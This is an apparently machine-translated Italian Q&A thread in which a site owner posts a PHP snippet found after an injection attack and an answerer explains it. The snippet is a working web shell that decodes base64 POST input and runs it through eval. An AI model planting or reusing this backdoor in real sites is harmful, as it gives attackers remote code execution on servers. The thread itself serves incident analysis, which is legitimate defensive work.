Non so se sia considerato o meno includere un singolo pezzo di codice che potrebbe essere dannoso. Ma recentemente il mio sito è stato vittima di qualche iniezione di URL. Mi stavo chiedendo se qualcuno può dirmi cosa fa questo codice:
<?php
$mujj = $_POST['x'];
if ($mujj!="") {
$xsser=base64_decode($_POST['z0']);
@eval("\$safedg = $xsser;");
} ?>
<?php
Ho cercato ulteriormente il tuo problema e ho scoperto che un utente malintenzionato ha utilizzato un'applicazione opensource webshell per esegui shell sul tuo server in una varietà di linguaggi di scripting comuni come ASP, ASPX, PHP, JSP, PL e Python.
Un rapido studio di questo script mi ha portato a sapere che:
$mujj = $_POST['x'];
if ($mujj!="") {
Controlla la password (password per qualcosa) inserita nella variabile x non è vuota (quale cosa puoi tradurre per: quando l'utente accede )
$xsser=base64_decode($_POST['z0']);
Decodifica il contenuto della variabile z0 e salvalo in $xsser . In realtà, z0 si riferisce a un file (è probabile che tu consenta il caricamento di file sulla tua applicazione web o potrebbe essere questa applicazione dannosa che consente il caricamento di file - cosa che è logica anche tu?)
@eval("\$safedg = $xsser;");
Il contenuto salvato in $xsser viene quindi eseguito (operazione pericolosa) sul server.
È una shell PHP che legge e valuta (esegue) i comandi PHP inviati alla shell tramite i messaggi HTTP-POST codificati in base64.
Ha bisogno di un certo valore per x per passare il controllo, e poi i comandi PHP codificati in b64 inviati attraverso il valore di z0 .